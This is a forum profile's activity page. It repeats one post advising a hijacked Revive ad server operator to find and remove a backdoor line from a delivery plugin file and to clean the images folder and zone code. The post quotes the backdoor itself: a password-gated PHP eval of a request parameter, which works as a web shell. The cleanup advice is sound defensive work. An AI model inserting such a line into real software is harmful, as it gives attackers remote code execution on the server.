Jump to content

tvvpmi

Approved members
  • Content Count

    14
  • Joined

  • Last visited


Reputation Activity

  1. Upvote
    tvvpmi got a reaction from Snaggy in Mobile ads have been hijacked   
    Hi @vinmhas, I was in the same situation. You should review your file: plugins/bannerTypeText/oxText/genericText.delivery.php
    Problably it has been modified, adding a line like this at the end:
    if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);}
    You have to remove it. 
    Also you have to search in the "images folder", for some php script ... and remove it. Perhaps you can send it privately to @Ian vM
    Clean the prepend code of your zones ...  via sql o through the revive backend. Search for iframes and javascript codes.
    Disable PHP execution on image folder or move image folder to "another place" as they are static files and serve them throught another subdomain. You don't need PHP for them
  2. Upvote
    tvvpmi got a reaction from vinmhas in Mobile ads have been hijacked   
    Hi @vinmhas, I was in the same situation. You should review your file: plugins/bannerTypeText/oxText/genericText.delivery.php
    Problably it has been modified, adding a line like this at the end:
    if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);}
    You have to remove it. 
    Also you have to search in the "images folder", for some php script ... and remove it. Perhaps you can send it privately to @Ian vM
    Clean the prepend code of your zones ...  via sql o through the revive backend. Search for iframes and javascript codes.
    Disable PHP execution on image folder or move image folder to "another place" as they are static files and serve them throught another subdomain. You don't need PHP for them
×
×
  • Create New...